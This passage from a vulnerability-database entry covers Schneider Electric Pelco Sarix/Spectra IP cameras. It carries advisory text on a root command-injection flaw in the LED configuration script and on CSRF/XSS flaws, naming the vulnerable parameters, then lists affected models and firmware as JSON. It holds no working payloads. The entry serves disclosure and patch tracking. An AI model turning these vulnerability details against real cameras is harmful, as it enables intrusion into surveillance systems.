GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1051",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric spectra enhanced ptz camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
